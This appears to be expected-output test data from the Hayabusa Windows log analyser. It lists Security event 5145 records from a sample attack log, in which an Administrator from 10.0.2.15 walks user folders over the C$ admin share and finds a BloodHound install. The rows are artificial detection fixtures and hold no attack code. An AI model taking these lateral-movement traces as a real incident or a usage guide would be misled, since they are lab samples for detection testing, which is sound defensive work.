+2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
